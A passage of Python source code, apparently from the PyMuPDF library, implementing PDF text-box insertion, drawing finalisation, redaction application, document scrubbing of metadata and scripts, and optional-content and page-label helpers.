tab.append(getTJstr(t, g, simple, ordering))
text = tab
color_str = ColorCode(color, "c")
fill_str = ColorCode(fill, "f")
if not fill and render_mode == 0: # ensure fill color when 0 Tr
fill = color
fill_str = ColorCode(color, "f")
morphing = CheckMorph(morph)
rot = rotate
if rot % 90 != 0:
raise ValueError("bad rotate value")
while rot < 0:
rot += 360
rot = rot % 360 # text rotate = 0, 90, 270, 180
templ1 = "\nq\n%s%sBT\n%s1 0 0 1 %g %g Tm\n/%s %g Tf "
templ2 = "TJ\n0 -%g TD\n"
cmp90 = "0 1 -1 0 0 0 cm\n" # rotates 90 deg counter-clockwise
cmm90 = "0 -1 1 0 0 0 cm\n" # rotates 90 deg clockwise
cm180 = "-1 0 0 -1 0 0 cm\n" # rotates by 180 deg.
height = self.height
width = self.width
# setting up for standard rotation directions
# case rotate = 0
if morphing:
m1 = Matrix(1, 0, 0, 1, morph[0].x + self.x, height - morph[0].y - self.y)
mat = ~m1 * morph[1] * m1
cm = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat)
else:
cm = ""
top = height - point.y - self.y # start of 1st char
left = point.x + self.x # start of 1. char
space = top # space available
headroom = point.y + self.y # distance to page border
if rot == 90:
left = height - point.y - self.y
top = -point.x - self.x
cm += cmp90
space = width - abs(top)
headroom = point.x + self.x
elif rot == 270:
left = -height + point.y + self.y
top = point.x + self.x
cm += cmm90
space = abs(top)
headroom = width - point.x - self.x
elif rot == 180:
left = -point.x - self.x
top = -height + point.y + self.y
cm += cm180
space = abs(point.y + self.y)
headroom = height - point.y - self.y
optcont = self.page._get_optional_content(oc)
if optcont != None:
bdc = "/OC /%s BDC\n" % optcont
emc = "EMC\n"
else:
bdc = emc = ""
alpha = self.page._set_opacity(CA=stroke_opacity, ca=fill_opacity)
if alpha == None:
alpha = ""
else:
alpha = "/%s gs\n" % alpha
nres = templ1 % (bdc, alpha, cm, left, top, fname, fontsize)
if render_mode > 0:
nres += "%i Tr " % render_mode
nres += "%g w " % (border_width * fontsize)
if color is not None:
nres += color_str
if fill is not None:
nres += fill_str
# =========================================================================
# start text insertion
# =========================================================================
nres += text[0]
nlines = 1 # set output line counter
if len(text) > 1:
nres += templ2 % lheight # line 1
else:
nres += templ2[:2]
for i in range(1, len(text)):
if space < lheight:
break # no space left on page
if i > 1:
nres += "\nT* "
nres += text[i] + templ2[:2]
space -= lheight
nlines += 1
nres += "\nET\n%sQ\n" % emc
# =====================================================================
# end of text insertion
# =====================================================================
# update the /Contents object
self.text_cont += nres
return nlines
# =========================================================================
# Shape.insert_textbox
# =========================================================================
def insert_textbox(
self,
rect: rect_like,
buffer: typing.Union[str, list],
fontname: OptStr = "helv",
fontfile: OptStr = None,
fontsize: float = 11,
lineheight: OptFloat = None,
set_simple: bool = 0,
encoding: int = 0,
color: OptSeq = None,
fill: OptSeq = None,
expandtabs: int = 1,
border_width: float = 0.05,
align: int = 0,
render_mode: int = 0,
rotate: int = 0,
morph: OptSeq = None,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> float:
"""Insert text into a given rectangle.
Args:
rect -- the textbox to fill
buffer -- text to be inserted
fontname -- a Base-14 font, font name or '/name'
fontfile -- name of a font file
fontsize -- font size
lineheight -- overwrite the font property
color -- RGB stroke color triple
fill -- RGB fill color triple
render_mode -- text rendering control
border_width -- thickness of glyph borders as percentage of fontsize
expandtabs -- handles tabulators with string function
align -- left, center, right, justified
rotate -- 0, 90, 180, or 270 degrees
morph -- morph box with a matrix and a fixpoint
Returns:
unused or deficit rectangle area (float)
"""
rect = Rect(rect)
if rect.is_empty or rect.is_infinite:
raise ValueError("text box must be finite and not empty")
color_str = ColorCode(color, "c")
fill_str = ColorCode(fill, "f")
if fill is None and render_mode == 0: # ensure fill color for 0 Tr
fill = color
fill_str = ColorCode(color, "f")
optcont = self.page._get_optional_content(oc)
if optcont != None:
bdc = "/OC /%s BDC\n" % optcont
emc = "EMC\n"
else:
bdc = emc = ""
# determine opacity / transparency
alpha = self.page._set_opacity(CA=stroke_opacity, ca=fill_opacity)
if alpha == None:
alpha = ""
else:
alpha = "/%s gs\n" % alpha
if rotate % 90 != 0:
raise ValueError("rotate must be multiple of 90")
rot = rotate
while rot < 0:
rot += 360
rot = rot % 360
# is buffer worth of dealing with?
if not bool(buffer):
return rect.height if rot in (0, 180) else rect.width
cmp90 = "0 1 -1 0 0 0 cm\n" # rotates counter-clockwise
cmm90 = "0 -1 1 0 0 0 cm\n" # rotates clockwise
cm180 = "-1 0 0 -1 0 0 cm\n" # rotates by 180 deg.
height = self.height
fname = fontname
if fname.startswith("/"):
fname = fname[1:]
xref = self.page.insert_font(
fontname=fname, fontfile=fontfile, encoding=encoding, set_simple=set_simple
)
fontinfo = CheckFontInfo(self.doc, xref)
fontdict = fontinfo[1]
ordering = fontdict["ordering"]
simple = fontdict["simple"]
glyphs = fontdict["glyphs"]
bfname = fontdict["name"]
ascender = fontdict["ascender"]
descender = fontdict["descender"]
if lineheight:
lheight_factor = lineheight
elif ascender - descender <= 1:
lheight_factor = 1.2
else:
lheight_factor = ascender - descender
lheight = fontsize * lheight_factor
# create a list from buffer, split into its lines
if type(buffer) in (list, tuple):
t0 = "\n".join(buffer)
else:
t0 = buffer
maxcode = max([ord(c) for c in t0])
# replace invalid char codes for simple fonts
if simple and maxcode > 255:
t0 = "".join([c if ord(c) < 256 else "?" for c in t0])
t0 = t0.splitlines()
glyphs = self.doc.get_char_widths(xref, maxcode + 1)
if simple and bfname not in ("Symbol", "ZapfDingbats"):
tj_glyphs = None
else:
tj_glyphs = glyphs
# ----------------------------------------------------------------------
# calculate pixel length of a string
# ----------------------------------------------------------------------
def pixlen(x):
"""Calculate pixel length of x."""
if ordering < 0:
return sum([glyphs[ord(c)][1] for c in x]) * fontsize
else:
return len(x) * fontsize
# ---------------------------------------------------------------------
if ordering < 0:
blen = glyphs[32][1] * fontsize # pixel size of space character
else:
blen = fontsize
text = "" # output buffer
if CheckMorph(morph):
m1 = Matrix(
1, 0, 0, 1, morph[0].x + self.x, self.height - morph[0].y - self.y
)
mat = ~m1 * morph[1] * m1
cm = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat)
else:
cm = ""
# ---------------------------------------------------------------------
# adjust for text orientation / rotation
# ---------------------------------------------------------------------
progr = 1 # direction of line progress
c_pnt = Point(0, fontsize * ascender) # used for line progress
if rot == 0: # normal orientation
point = rect.tl + c_pnt # line 1 is 'lheight' below top
maxwidth = rect.width # pixels available in one line
maxheight = rect.height # available text height
elif rot == 90: # rotate counter clockwise
c_pnt = Point(fontsize * ascender, 0) # progress in x-direction
point = rect.bl + c_pnt # line 1 'lheight' away from left
maxwidth = rect.height # pixels available in one line
maxheight = rect.width # available text height
cm += cmp90
elif rot == 180: # text upside down
# progress upwards in y direction
c_pnt = -Point(0, fontsize * ascender)
point = rect.br + c_pnt # line 1 'lheight' above bottom
maxwidth = rect.width # pixels available in one line
progr = -1 # subtract lheight for next line
maxheight = rect.height # available text height
cm += cm180
else: # rotate clockwise (270 or -90)
# progress from right to left
c_pnt = -Point(fontsize * ascender, 0)
point = rect.tr + c_pnt # line 1 'lheight' left of right
maxwidth = rect.height # pixels available in one line
progr = -1 # subtract lheight for next line
maxheight = rect.width # available text height
cm += cmm90
# =====================================================================
# line loop
# =====================================================================
just_tab = [] # 'justify' indicators per line
for i, line in enumerate(t0):
line_t = line.expandtabs(expandtabs).split(" ") # split into words
num_words = len(line_t)
lbuff = "" # init line buffer
rest = maxwidth # available line pixels
# =================================================================
# word loop
# =================================================================
for j in range(num_words):
word = line_t[j]
pl_w = pixlen(word) # pixel len of word
if rest >= pl_w: # does it fit on the line?
lbuff += word + " " # yes, append word
rest -= pl_w + blen # update available line space
continue # next word
# word doesn't fit - output line (if not empty)
if lbuff:
lbuff = lbuff.rstrip() + "\n" # line full, append line break
text += lbuff # append to total text
just_tab.append(True) # can align-justify
lbuff = "" # re-init line buffer
rest = maxwidth # re-init avail. space
if pl_w <= maxwidth: # word shorter than 1 line?
lbuff = word + " " # start the line with it
rest = maxwidth - pl_w - blen # update free space
continue
# long word: split across multiple lines - char by char ...
if len(just_tab) > 0:
just_tab[-1] = False # cannot align-justify
for c in word:
if pixlen(lbuff) <= maxwidth - pixlen(c):
lbuff += c
else: # line full
lbuff += "\n" # close line
text += lbuff # append to text
just_tab.append(False) # cannot align-justify
lbuff = c # start new line with this char
lbuff += " " # finish long word
rest = maxwidth - pixlen(lbuff) # long word stored
if lbuff: # unprocessed line content?
text += lbuff.rstrip() # append to text
just_tab.append(False) # cannot align-justify
if i < len(t0) - 1: # not the last line?
text += "\n" # insert line break
# compute used part of the textbox
if text.endswith("\n"):
text = text[:-1]
lb_count = text.count("\n") + 1 # number of lines written
# text height = line count * line height plus one descender value
text_height = lheight * lb_count - descender * fontsize
more = text_height - maxheight # difference to height limit
if more > EPSILON: # landed too much outside rect
return (-1) * more # return deficit, don't output
more = abs(more)
if more < EPSILON:
more = 0 # don't bother with epsilons
nres = "\nq\n%s%sBT\n" % (bdc, alpha) + cm # initialize output buffer
templ = "1 0 0 1 %g %g Tm /%s %g Tf "
# center, right, justify: output each line with its own specifics
text_t = text.splitlines() # split text in lines again
just_tab[-1] = False # never justify last line
for i, t in enumerate(text_t):
pl = maxwidth - pixlen(t) # length of empty line part
pnt = point + c_pnt * (i * lheight_factor) # text start of line
if align == 1: # center: right shift by half width
if rot in (0, 180):
pnt = pnt + Point(pl / 2, 0) * progr
else:
pnt = pnt - Point(0, pl / 2) * progr
elif align == 2: # right: right shift by full width
if rot in (0, 180):
pnt = pnt + Point(pl, 0) * progr
else:
pnt = pnt - Point(0, pl) * progr
elif align == 3: # justify
spaces = t.count(" ") # number of spaces in line
if spaces > 0 and just_tab[i]: # if any, and we may justify
spacing = pl / spaces # make every space this much larger
else:
spacing = 0 # keep normal space length
top = height - pnt.y - self.y
left = pnt.x + self.x
if rot == 90:
left = height - pnt.y - self.y
top = -pnt.x - self.x
elif rot == 270:
left = -height + pnt.y + self.y
top = pnt.x + self.x
elif rot == 180:
left = -pnt.x - self.x
top = -height + pnt.y + self.y
nres += templ % (left, top, fname, fontsize)
if render_mode > 0:
nres += "%i Tr " % render_mode
nres += "%g w " % (border_width * fontsize)
if align == 3:
nres += "%g Tw " % spacing
if color is not None:
nres += color_str
if fill is not None:
nres += fill_str
nres += "%sTJ\n" % getTJstr(t, tj_glyphs, simple, ordering)
nres += "ET\n%sQ\n" % emc
self.text_cont += nres
self.updateRect(rect)
return more
def finish(
self,
width: float = 1,
color: OptSeq = (0,),
fill: OptSeq = None,
lineCap: int = 0,
lineJoin: int = 0,
dashes: OptStr = None,
even_odd: bool = False,
morph: OptSeq = None,
closePath: bool = True,
fill_opacity: float = 1,
stroke_opacity: float = 1,
oc: int = 0,
) -> None:
"""Finish the current drawing segment.
Notes:
Apply colors, opacity, dashes, line style and width, or
morphing. Also whether to close the path
by connecting last to first point.
"""
if self.draw_cont == "": # treat empty contents as no-op
return
if width == 0: # border color makes no sense then
color = None
elif color == None: # vice versa
width = 0
# if color == None and fill == None:
# raise ValueError("at least one of 'color' or 'fill' must be given")
color_str = ColorCode(color, "c") # ensure proper color string
fill_str = ColorCode(fill, "f") # ensure proper fill string
optcont = self.page._get_optional_content(oc)
if optcont is not None:
self.draw_cont = "/OC /%s BDC\n" % optcont + self.draw_cont
emc = "EMC\n"
else:
emc = ""
alpha = self.page._set_opacity(CA=stroke_opacity, ca=fill_opacity)
if alpha != None:
self.draw_cont = "/%s gs\n" % alpha + self.draw_cont
if width != 1 and width != 0:
self.draw_cont += "%g w\n" % width
if lineCap != 0:
self.draw_cont = "%i J\n" % lineCap + self.draw_cont
if lineJoin != 0:
self.draw_cont = "%i j\n" % lineJoin + self.draw_cont
if dashes not in (None, "", "[] 0"):
self.draw_cont = "%s d\n" % dashes + self.draw_cont
if closePath:
self.draw_cont += "h\n"
self.lastPoint = None
if color is not None:
self.draw_cont += color_str
if fill is not None:
self.draw_cont += fill_str
if color is not None:
if not even_odd:
self.draw_cont += "B\n"
else:
self.draw_cont += "B*\n"
else:
if not even_odd:
self.draw_cont += "f\n"
else:
self.draw_cont += "f*\n"
else:
self.draw_cont += "S\n"
self.draw_cont += emc
if CheckMorph(morph):
m1 = Matrix(
1, 0, 0, 1, morph[0].x + self.x, self.height - morph[0].y - self.y
)
mat = ~m1 * morph[1] * m1
self.draw_cont = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat) + self.draw_cont
self.totalcont += "\nq\n" + self.draw_cont + "Q\n"
self.draw_cont = ""
self.lastPoint = None
return
def commit(self, overlay: bool = True) -> None:
"""Update the page's /Contents object with Shape data. The argument controls whether data appear in foreground (default) or background."""
CheckParent(self.page) # doc may have died meanwhile
self.totalcont += self.text_cont
self.totalcont = self.totalcont.encode()
if self.totalcont != b"":
# make /Contents object with dummy stream
xref = TOOLS._insert_contents(self.page, b" ", overlay)
# update it with potential compression
self.doc.update_stream(xref, self.totalcont)
self.lastPoint = None # clean up ...
self.rect = None #
self.draw_cont = "" # for potential ...
self.text_cont = "" # ...
self.totalcont = "" # re-use
return
def apply_redactions(page: Page, images: int = 2) -> bool:
"""Apply the redaction annotations of the page.
Args:
page: the PDF page.
images: 0 - ignore images, 1 - remove complete overlapping image,
2 - blank out overlapping image parts.
"""
def center_rect(annot_rect, text, font, fsize):
"""Calculate minimal sub-rectangle for the overlay text.
Notes:
Because 'insert_textbox' supports no vertical text centering,
we calculate an approximate number of lines here and return a
sub-rect with smaller height, which should still be sufficient.
Args:
annot_rect: the annotation rectangle
text: the text to insert.
font: the fontname. Must be one of the CJK or Base-14 set, else
the rectangle is returned unchanged.
fsize: the fontsize
Returns:
A rectangle to use instead of the annot rectangle.
"""
if not text:
return annot_rect
try:
text_width = get_text_length(text, font, fsize)
except ValueError: # unsupported font
return annot_rect
line_height = fsize * 1.2
limit = annot_rect.width
h = math.ceil(text_width / limit) * line_height # estimate rect height
if h >= annot_rect.height:
return annot_rect
r = annot_rect
y = (annot_rect.tl.y + annot_rect.bl.y - h) * 0.5
r.y0 = y
return r
CheckParent(page)
doc = page.parent
if doc.is_encrypted or doc.is_closed:
raise ValueError("document closed or encrypted")
if not doc.is_pdf:
raise ValueError("is no PDF")
redact_annots = [] # storage of annot values
for annot in page.annots(types=(PDF_ANNOT_REDACT,)): # loop redactions
redact_annots.append(annot._get_redact_values()) # save annot values
if redact_annots == []: # any redactions on this page?
return False # no redactions
rc = page._apply_redactions(images) # call MuPDF redaction process step
if not rc: # should not happen really
raise ValueError("Error applying redactions.")
# now write replacement text in old redact rectangles
shape = page.new_shape()
for redact in redact_annots:
annot_rect = redact["rect"]
fill = redact["fill"]
if fill:
shape.draw_rect(annot_rect) # colorize the rect background
shape.finish(fill=fill, color=fill)
if "text" in redact.keys(): # if we also have text
text = redact["text"]
align = redact.get("align", 0)
fname = redact["fontname"]
fsize = redact["fontsize"]
color = redact["text_color"]
# try finding vertical centered sub-rect
trect = center_rect(annot_rect, text, fname, fsize)
rc = -1
while rc < 0 and fsize >= 4: # while not enough room
# (re-) try insertion
rc = shape.insert_textbox(
trect,
text,
fontname=fname,
fontsize=fsize,
color=color,
align=align,
)
fsize -= 0.5 # reduce font if unsuccessful
shape.commit() # append new contents object
return True
# ------------------------------------------------------------------------------
# Remove potentially sensitive data from a PDF. Similar to the Adobe
# Acrobat 'sanitize' function
# ------------------------------------------------------------------------------
def scrub(
doc: Document,
attached_files: bool = True,
clean_pages: bool = True,
embedded_files: bool = True,
hidden_text: bool = True,
javascript: bool = True,
metadata: bool = True,
redactions: bool = True,
redact_images: int = 0,
remove_links: bool = True,
reset_fields: bool = True,
reset_responses: bool = True,
thumbnails: bool = True,
xml_metadata: bool = True,
) -> None:
def remove_hidden(cont_lines):
"""Remove hidden text from a PDF page.
Args:
cont_lines: list of lines with /Contents content. Should have status
from after page.cleanContents().
Returns:
List of /Contents lines from which hidden text has been removed.
Notes:
The input must have been created after the page's /Contents object(s)
have been cleaned with page.cleanContents(). This ensures a standard
formatting: one command per line, single spaces between operators.
This allows for drastic simplification of this code.
"""
out_lines = [] # will return this
in_text = False # indicate if within BT/ET object
suppress = False # indicate text suppression active
make_return = False
for line in cont_lines:
if line == b"BT": # start of text object
in_text = True # switch on
out_lines.append(line) # output it
continue
if line == b"ET": # end of text object
in_text = False # switch off
out_lines.append(line) # output it
continue
if line == b"3 Tr": # text suppression operator
suppress = True # switch on
make_return = True
continue
if line[-2:] == b"Tr" and line[0] != b"3":
suppress = False # text rendering changed
out_lines.append(line)
continue
if line == b"Q": # unstack command also switches off
suppress = False
out_lines.append(line)
continue
if suppress and in_text: # suppress hidden lines
continue
out_lines.append(line)
if make_return:
return out_lines
else:
return None
if not doc.is_pdf: # only works for PDF
raise ValueError("is no PDF")
if doc.is_encrypted or doc.is_closed:
raise ValueError("closed or encrypted doc")
if clean_pages is False:
hidden_text = False
redactions = False
if metadata:
doc.set_metadata({}) # remove standard metadata
for page in doc:
if reset_fields:
# reset form fields (widgets)
for widget in page.widgets():
widget.reset()
if remove_links:
links = page.get_links() # list of all links on page
for link in links: # remove all links
page.delete_link(link)
found_redacts = False
for annot in page.annots():
if annot.type[0] == PDF_ANNOT_FILE_ATTACHMENT and attached_files:
annot.update_file(buffer=b" ") # set file content to empty
if reset_responses:
annot.delete_responses()
if annot.type[0] == PDF_ANNOT_REDACT:
found_redacts = True
if redactions and found_redacts:
page.apply_redactions(images=redact_images)
if not (clean_pages or hidden_text):
continue # done with the page
page.clean_contents()
if not page.get_contents():
continue
if hidden_text:
xref = page.get_contents()[0] # only one b/o cleaning!
cont = doc.xref_stream(xref)
cont_lines = remove_hidden(cont.splitlines()) # remove hidden text
if cont_lines: # something was actually removed
cont = b"\n".join(cont_lines)
doc.update_stream(xref, cont) # rewrite the page /Contents
if thumbnails: # remove page thumbnails?
if doc.xref_get_key(page.xref, "Thumb")[0] != "null":
doc.xref_set_key(page.xref, "Thumb", "null")
# pages are scrubbed, now perform document-wide scrubbing
# remove embedded files
if embedded_files:
for name in doc.embfile_names():
doc.embfile_del(name)
if xml_metadata:
doc.del_xml_metadata()
if not (xml_metadata or javascript):
xref_limit = 0
else:
xref_limit = doc.xref_length()
for xref in range(1, xref_limit):
if not doc.xref_object(xref):
msg = "bad xref %i - clean PDF before scrubbing" % xref
raise ValueError(msg)
if javascript and doc.xref_get_key(xref, "S")[1] == "/JavaScript":
# a /JavaScript action object
obj = "<</S/JavaScript/JS()>>" # replace with a null JavaScript
doc.update_object(xref, obj) # update this object
continue # no further handling
if not xml_metadata:
continue
if doc.xref_get_key(xref, "Type")[1] == "/Metadata":
# delete any metadata object directly
doc.update_object(xref, "<<>>")
doc.update_stream(xref, b"deleted", new=True)
continue
if doc.xref_get_key(xref, "Metadata")[0] != "null":
doc.xref_set_key(xref, "Metadata", "null")
def fill_textbox(
writer: TextWriter,
rect: rect_like,
text: typing.Union[str, list],
pos: point_like = None,
font: typing.Optional[Font] = None,
fontsize: float = 11,
lineheight: OptFloat = None,
align: int = 0,
warn: bool = None,
right_to_left: bool = False,
small_caps: bool = False,
) -> tuple:
"""Fill a rectangle with text.
Args:
writer: TextWriter object (= "self")
rect: rect-like to receive the text.
text: string or list/tuple of strings.
pos: point-like start position of first word.
font: Font object (default Font('helv')).
fontsize: the fontsize.
lineheight: overwrite the font property
align: (int) 0 = left, 1 = center, 2 = right, 3 = justify
warn: (bool) text overflow action: none, warn, or exception
right_to_left: (bool) indicate right-to-left language.
"""
rect = Rect(rect)
if rect.is_empty:
raise ValueError("fill rect must not empty.")
if type(font) is not Font:
font = Font("helv")
def textlen(x):
"""Return length of a string."""
return font.text_length(
x, fontsize=fontsize, small_caps=small_caps
) # abbreviation
def char_lengths(x):
"""Return list of single character lengths for a string."""
return font.char_lengths(x, fontsize=fontsize, small_caps=small_caps)
def append_this(pos, text):
return writer.append(
pos, text, font=font, fontsize=fontsize, small_caps=small_caps
)
tolerance = fontsize * 0.2 # extra distance to left border
space_len = textlen(" ")
std_width = rect.width - tolerance
std_start = rect.x0 + tolerance
def norm_words(width, words):
"""Cut any word in pieces no longer than 'width'."""
nwords = []
word_lengths = []
for w in words:
wl_lst = char_lengths(w)
wl = sum(wl_lst)
if wl <= width: # nothing to do - copy over
nwords.append(w)
word_lengths.append(wl)
continue
# word longer than rect width - split it in parts
n = len(wl_lst)
while n > 0:
wl = sum(wl_lst[:n])
if wl <= width:
nwords.append(w[:n])
word_lengths.append(wl)
w = w[n:]
wl_lst = wl_lst[n:]
n = len(wl_lst)
else:
n -= 1
return nwords, word_lengths
def output_justify(start, line):
"""Justified output of a line."""
# ignore leading / trailing / multiple spaces
words = [w for w in line.split(" ") if w != ""]
nwords = len(words)
if nwords == 0:
return
if nwords == 1: # single word cannot be justified
append_this(start, words[0])
return
tl = sum([textlen(w) for w in words]) # total word lengths
gaps = nwords - 1 # number of word gaps
gapl = (std_width - tl) / gaps # width of each gap
for w in words:
_, lp = append_this(start, w) # output one word
start.x = lp.x + gapl # next start at word end plus gap
return
asc = font.ascender
dsc = font.descender
if not lineheight:
if asc - dsc <= 1:
lheight = 1.2
else:
lheight = asc - dsc
else:
lheight = lineheight
LINEHEIGHT = fontsize * lheight # effective line height
width = std_width # available horizontal space
# starting point of text
if pos is not None:
pos = Point(pos)
else: # default is just below rect top-left
pos = rect.tl + (tolerance, fontsize * asc)
if not pos in rect:
raise ValueError("Text must start in rectangle.")
# calculate displacement factor for alignment
if align == TEXT_ALIGN_CENTER:
factor = 0.5
elif align == TEXT_ALIGN_RIGHT:
factor = 1.0
else:
factor = 0
# split in lines if just a string was given
if type(text) is str:
textlines = text.splitlines()
else:
textlines = []
for line in text:
textlines.extend(line.splitlines())
max_lines = int((rect.y1 - pos.y) / LINEHEIGHT) + 1
new_lines = [] # the final list of textbox lines
no_justify = [] # no justify for these line numbers
for i, line in enumerate(textlines):
if line in ("", " "):
new_lines.append((line, space_len))
width = rect.width - tolerance
no_justify.append((len(new_lines) - 1))
continue
if i == 0:
width = rect.x1 - pos.x
else:
width = rect.width - tolerance
if right_to_left: # reverses Arabic / Hebrew text front to back
line = writer.clean_rtl(line)
tl = textlen(line)
if tl <= width: # line short enough
new_lines.append((line, tl))
no_justify.append((len(new_lines) - 1))
continue
# we need to split the line in fitting parts
words = line.split(" ") # the words in the line
# cut in parts any words that are longer than rect width
words, word_lengths = norm_words(std_width, words)
n = len(words)
while True:
line0 = " ".join(words[:n])
wl = sum(word_lengths[:n]) + space_len * (len(word_lengths[:n]) - 1)
if wl <= width:
new_lines.append((line0, wl))
words = words[n:]
word_lengths = word_lengths[n:]
n = len(words)
line0 = None
else:
n -= 1
if len(words) == 0:
break
# -------------------------------------------------------------------------
# List of lines created. Each item is (text, tl), where 'tl' is the PDF
# output length (float) and 'text' is the text. Except for justified text,
# this is output-ready.
# -------------------------------------------------------------------------
nlines = len(new_lines)
if nlines > max_lines:
msg = "Only fitting %i of %i lines." % (max_lines, nlines)
if warn == True:
print("Warning: " + msg)
elif warn == False:
raise ValueError(msg)
start = Point()
no_justify += [len(new_lines) - 1] # no justifying of last line
for i in range(max_lines):
try:
line, tl = new_lines.pop(0)
except IndexError:
break
if right_to_left: # Arabic, Hebrew
line = "".join(reversed(line))
if i == 0: # may have different start for first line
start = pos
if align == TEXT_ALIGN_JUSTIFY and i not in no_justify and tl < std_width:
output_justify(start, line)
start.x = std_start
start.y += LINEHEIGHT
continue
if i > 0 or pos.x == std_start: # left, center, right alignments
start.x += (width - tl) * factor
append_this(start, line)
start.x = std_start
start.y += LINEHEIGHT
return new_lines # return non-written lines
# ------------------------------------------------------------------------
# Optional Content functions
# ------------------------------------------------------------------------
def get_oc(doc: Document, xref: int) -> int:
"""Return optional content object xref for an image or form xobject.
Args:
xref: (int) xref number of an image or form xobject.
"""
if doc.is_closed or doc.is_encrypted:
raise ValueError("document close or encrypted")
t, name = doc.xref_get_key(xref, "Subtype")
if t != "name" or name not in ("/Image", "/Form"):
raise ValueError("bad object type at xref %i" % xref)
t, oc = doc.xref_get_key(xref, "OC")
if t != "xref":
return 0
rc = int(oc.replace("0 R", ""))
return rc
def set_oc(doc: Document, xref: int, oc: int) -> None:
"""Attach optional content object to image or form xobject.
Args:
xref: (int) xref number of an image or form xobject
oc: (int) xref number of an OCG or OCMD
"""
if doc.is_closed or doc.is_encrypted:
raise ValueError("document close or encrypted")
t, name = doc.xref_get_key(xref, "Subtype")
if t != "name" or name not in ("/Image", "/Form"):
raise ValueError("bad object type at xref %i" % xref)
if oc > 0:
t, name = doc.xref_get_key(oc, "Type")
if t != "name" or name not in ("/OCG", "/OCMD"):
raise ValueError("bad object type at xref %i" % oc)
if oc == 0 and "OC" in doc.xref_get_keys(xref):
doc.xref_set_key(xref, "OC", "null")
return None
doc.xref_set_key(xref, "OC", "%i 0 R" % oc)
return None
def set_ocmd(
doc: Document,
xref: int = 0,
ocgs: typing.Union[list, None] = None,
policy: OptStr = None,
ve: typing.Union[list, None] = None,
) -> int:
"""Create or update an OCMD object in a PDF document.
Args:
xref: (int) 0 for creating a new object, otherwise update existing one.
ocgs: (list) OCG xref numbers, which shall be subject to 'policy'.
policy: one of 'AllOn', 'AllOff', 'AnyOn', 'AnyOff' (any casing).
ve: (list) visibility expression. Use instead of 'ocgs' with 'policy'.
Returns:
Xref of the created or updated OCMD.
"""
all_ocgs = set(doc.get_ocgs().keys())
def ve_maker(ve):
if type(ve) not in (list, tuple) or len(ve) < 2:
raise ValueError("bad 've' format: %s" % ve)
if ve[0].lower() not in ("and", "or", "not"):
raise ValueError("bad operand: %s" % ve[0])
if ve[0].lower() == "not" and len(ve) != 2:
raise ValueError("bad 've' format: %s" % ve)
item = "[/%s" % ve[0].title()
for x in ve[1:]:
if type(x) is int:
if x not in all_ocgs:
raise ValueError("bad OCG %i" % x)
item += " %i 0 R" % x
else:
item += " %s" % ve_maker(x)
item += "]"
return item
text = "<</Type/OCMD"
if ocgs and type(ocgs) in (list, tuple): # some OCGs are provided
s = set(ocgs).difference(all_ocgs) # contains illegal xrefs
if s != set():
msg = "bad OCGs: %s" % s
raise ValueError(msg)
text += "/OCGs[" + " ".join(map(lambda x: "%i 0 R" % x, ocgs)) + "]"
if policy:
policy = str(policy).lower()
pols = {
"anyon": "AnyOn",
"allon": "AllOn",
"anyoff": "AnyOff",
"alloff": "AllOff",
}
if policy not in ("anyon", "allon", "anyoff", "alloff"):
raise ValueError("bad policy: %s" % policy)
text += "/P/%s" % pols[policy]
if ve:
text += "/VE%s" % ve_maker(ve)
text += ">>"
# make new object or replace old OCMD (check type first)
if xref == 0:
xref = doc.get_new_xref()
elif "/Type/OCMD" not in doc.xref_object(xref, compressed=True):
raise ValueError("bad xref or not an OCMD")
doc.update_object(xref, text)
return xref
def get_ocmd(doc: Document, xref: int) -> dict:
"""Return the definition of an OCMD (optional content membership dictionary).
Recognizes PDF dict keys /OCGs (PDF array of OCGs), /P (policy string) and
/VE (visibility expression, PDF array). Via string manipulation, this
info is converted to a Python dictionary with keys "xref", "ocgs", "policy"
and "ve" - ready to recycle as input for 'set_ocmd()'.
"""
if xref not in range(doc.xref_length()):
raise ValueError("bad xref")
text = doc.xref_object(xref, compressed=True)
if "/Type/OCMD" not in text:
raise ValueError("bad object type")
textlen = len(text)
p0 = text.find("/OCGs[") # look for /OCGs key
p1 = text.find("]", p0)
if p0 < 0 or p1 < 0: # no OCGs found
ocgs = None
else:
ocgs = text[p0 + 6 : p1].replace("0 R", " ").split()
ocgs = list(map(int, ocgs))
p0 = text.find("/P/") # look for /P policy key
if p0 < 0:
policy = None
else:
p1 = text.find("ff", p0)
if p1 < 0:
p1 = text.find("on", p0)
if p1 < 0: # some irregular syntax
raise ValueError("bad object at xref")
else:
policy = text[p0 + 3 : p1 + 2]
p0 = text.find("/VE[") # look for /VE visibility expression key
if p0 < 0: # no visibility expression found
ve = None
else:
lp = rp = 0 # find end of /VE by finding last ']'.
p1 = p0
while lp < 1 or lp != rp:
p1 += 1
if not p1 < textlen: # some irregular syntax
raise ValueError("bad object at xref")
if text[p1] == "[":
lp += 1
if text[p1] == "]":
rp += 1
# p1 now positioned at the last "]"
ve = text[p0 + 3 : p1 + 1] # the PDF /VE array
ve = (
ve.replace("/And", '"and",')
.replace("/Not", '"not",')
.replace("/Or", '"or",')
)
ve = ve.replace(" 0 R]", "]").replace(" 0 R", ",").replace("][", "],[")
try:
ve = json.loads(ve)
except:
print("bad /VE key: ", ve)
raise
return {"xref": xref, "ocgs": ocgs, "policy": policy, "ve": ve}
"""
Handle page labels for PDF documents.
Reading
-------
* compute the label of a page
* find page number(s) having the given label.
Writing
-------
Supports setting (defining) page labels for PDF documents.
A big Thank You goes to WILLIAM CHAPMAN who contributed the idea and
significant parts of the following code during late December 2020
through early January 2021.
"""
def rule_dict(item):
"""Make a Python dict from a PDF page label rule.
Args:
item -- a tuple (pno, rule) with the start page number and the rule
string like <</S/D...>>.
Returns:
A dict like
{'startpage': int, 'prefix': str, 'style': str, 'firstpagenum': int}.
"""
# Jorj McKie, 2021-01-06
pno, rule = item
rule = rule[2:-2].split("/")[1:] # strip "<<" and ">>"
d = {"startpage": pno, "prefix": "", "firstpagenum": 1}
skip = False
for i, item in enumerate(rule):
if skip: # this item has already been processed
skip = False # deactivate skipping again
continue
if item == "S": # style specification
d["style"] = rule[i + 1] # next item has the style
skip = True # do not process next item again
continue
if item.startswith("P"): # prefix specification: extract the string
x = item[1:].replace("(", "").replace(")", "")
d["prefix"] = x
continue
if item.startswith("St"): # start page number specification
x = int(item[2:])
d["firstpagenum"] = x
return d
def get_label_pno(pgNo, labels):
"""Return the label for this page number.
Args:
pgNo: page number, 0-based.
